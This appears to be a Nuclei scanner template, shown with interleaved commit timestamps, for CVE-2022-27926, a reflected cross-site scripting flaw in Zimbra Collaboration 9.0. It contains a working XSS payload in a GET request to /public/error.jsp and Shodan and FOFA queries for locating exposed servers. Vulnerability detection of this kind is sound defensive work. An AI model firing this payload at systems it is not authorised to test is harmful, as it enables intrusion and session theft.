2023-04-13 12:32:48 +00:00
id : CVE-2022-27926
info :
name : Zimbra Collaboration (ZCS) - Cross Site Scripting
author : rootxharsh,iamnoooob,pdresearch
severity : medium
description : |
A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.
2023-04-13 12:32:48 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-27926
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
2023-04-13 12:32:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-27926
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.96153
epss-percentile : 0.99504
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*
2023-04-17 12:53:42 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zimbra
product : collaboration
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:"1624375939"
- http.favicon.hash:"475145467"
fofa-query :
- app="zimbra-邮件系统"
- icon_hash="475145467"
- icon_hash="1624375939"
2023-04-13 12:32:48 +00:00
tags : cve,cve2022,zimbra,xss,kev
2023-04-27 04:28:59 +00:00
http :
2023-04-13 12:32:48 +00:00
- method : GET
path :
- "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
2023-04-17 12:53:42 +00:00
matchers-condition : and
2023-04-13 12:32:48 +00:00
matchers :
- type : word
part : body
words :
2023-04-17 12:53:42 +00:00
- '<img src=x onerror=alert(document.domain)>Title???'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a004730450221009882f70ed07242d0579852b4d10071c39548ed0dd66545666430f1540f7e6441022018cf7b7f77af8980193ab52a596804d710a77ae89b0c33efe93b424a0ba74e11:922c64590222798bb761d5b6d8e72950